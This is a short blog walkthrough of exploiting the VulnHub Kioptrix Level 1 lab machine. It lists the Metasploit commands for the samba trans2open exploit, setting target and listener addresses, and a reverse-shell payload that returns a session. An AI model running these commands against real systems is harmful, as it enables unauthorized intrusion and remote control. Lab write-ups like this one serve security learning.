WalkThrough! Kioptrix — 1 (Part 2) By VulnHub

Kamran Saifullah
2 min readMar 10, 2018

--

Hi,

I hope the first WalkThrough of Kioptrix-1 was easy and fun to read. Here is the second part of it.

After successfully exploiting the Kioptrix Level 1 machine using the Samba exploit. I moved forward to look for its exploitation using metasploit. Firstly i looked for the samba exploits using the search command and found multiple exploits for it. As i knew it’s running on Reh-Hat linux so the linux exploit is the right one.

search samba

Then i used this exploit by using the command and hit options command for the requirements;

use exploit/linux/samba/trans2open

show options

After this i set the RHOST to the target IP address and looked for available payloads for reverse meterpreter connection.

set RHOST 192.168.97.133

show payloads

set PAYLOAD generic/shell_reverse_tcp

After this i had to set the LHOST for the reverse connection So;

set LHOST <Our IP>

exploit

At the end after running the exploit command i gained the meterpreter session and now i was able to interact with the Kioptrix Machine.

That’s how i exploited it using the Metasploit.

Thanks for reading.

Best Regards,

Kamran Saifullah

--

--

Kamran Saifullah
Kamran Saifullah

Written by Kamran Saifullah

Malware/RE/Firmware Analysis, App Sec/Off Sec, VAPT, Phishing Simulations/SE | Risk Management, IS Governance, Audits, ISO 27001 LI

No responses yet